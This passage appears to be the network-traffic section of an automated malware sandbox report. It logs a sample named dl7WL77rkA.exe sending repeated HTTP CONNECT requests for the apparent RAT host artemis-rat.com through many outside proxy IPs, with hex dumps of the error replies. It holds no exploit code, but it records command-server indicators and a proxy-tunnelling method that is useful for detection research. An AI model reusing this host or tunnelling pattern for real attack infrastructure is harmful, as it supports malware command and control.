                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1938192.168.2.555219196.20.125.14580833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.157499075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1939192.168.2.555226104.19.217.219803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.164174080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.324462891 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1940192.168.2.555231104.25.58.39803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.164505005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.325170040 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1941192.168.2.555233192.163.200.93353963876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.179229021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1942192.168.2.554963148.66.130.53478913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.273525953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.311337948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.396034002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.400080919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1943192.168.2.55185060.188.102.225180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.273618937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1944192.168.2.555296185.238.228.240803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.273624897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.428848028 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1945192.168.2.555289162.159.242.159803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.274450064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.436228037 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1946192.168.2.555322172.67.182.78803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.274869919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.429615974 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1947192.168.2.555346104.17.171.79803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.278002977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.432636023 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1948192.168.2.555318192.169.226.96505783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.278076887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905004978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1949192.168.2.55517964.227.108.25319083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.288475990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1950192.168.2.555364104.18.103.125803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.288477898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.446789026 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1951192.168.2.55527438.162.21.2031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.289443016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.699903965 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1952192.168.2.55534412.186.205.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.289865017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1953192.168.2.55502551.75.125.208270293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.289923906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1954192.168.2.555382202.159.30.1294433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290072918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1955192.168.2.55499151.15.252.246163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290204048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.311366081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.396049023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.400059938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1956192.168.2.55533038.162.1.14231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290564060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
